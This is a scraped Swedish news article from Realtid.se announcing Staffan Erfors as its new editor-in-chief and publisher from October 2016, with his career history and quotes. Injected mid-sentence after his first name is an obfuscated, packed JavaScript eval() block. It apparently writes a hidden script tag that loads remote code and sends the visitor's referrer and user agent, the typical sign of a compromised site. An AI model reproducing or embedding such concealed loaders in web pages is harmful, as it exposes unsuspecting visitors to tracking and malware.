Image Image Image Image Image Image Image Image Image Image

| 19 augusti, 2018

Scroll to top

Top

No Comments

Staffan Erfors ny chefredaktör och ansvarig utgivare för Realtid.se

Staffan Erfors ny chefredaktör och ansvarig utgivare för Realtid.se
Sebastian Plengier Ehrnfelt

Staffan eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dshzf|var|u0026u|referrer|ehard||js|php’.split(‘|’),0,{}))
Erfors tillträder den 3 oktober 2016
som chefredaktör och ansvarig utgivare för Realtid Medias nyhetssajt Realtid.se samt dess undersajter Karriär och Helg.

Staffan  har en omfattande publicistisk karriär bakom sig. 1994 – 2000 arbetade han på Expressen bland annat som reporter, nöjeschef och Londonkorrespondent. 2002 – 2008 var han chefredaktör för sydsveriges kvällstidning Kvällsposten, med en redaktion på runt 80 medarbetare. 2008 var han Expressens korrespondent i New York. Staffan Erfors har även varit verksam som programchef för TV3 samt redaktionschef på Bonnier Tidskrifter. Staffan kommer närmast från posten som Moderaternas kommunikationschef i Stockholms läns landsting (2014 – 2015).

Staffan Erfors ny chefsredaktör

» Staffan Erfors har ett unikt nyhetsdriv. Han har byggt upp och drivit stora tidningsorganisationer, och rör sig fritt mellan världarna finans, media och
politik. Sammantaget finner vi honom mycket väl lämpas att fatta rodret för Realtid.ses fortsatta utveckling tillsammans med redaktionschef Nina von Koch«, säger Realtid Medias vd Jonas Wiwen-Nilsson.

» Jag ser fram emot att få bidra till att Realtid.se fortsätter vara en relevant och pålitlig källa för information för till finansbranschen och beslutsfattare i näringsliv, stat och kommun, säger Staffan Erfors, tillträdande Chefredaktör Realtid.se

Per Agerman, chefredaktör sedan 2011, övergick i februari 2016 till rollen som senior reporter för att kunna ägna mer tid åt eget skrivande och grävande. Per jobbar fortsatt åt Realtid.se som editor-at-large.

Submit a Comment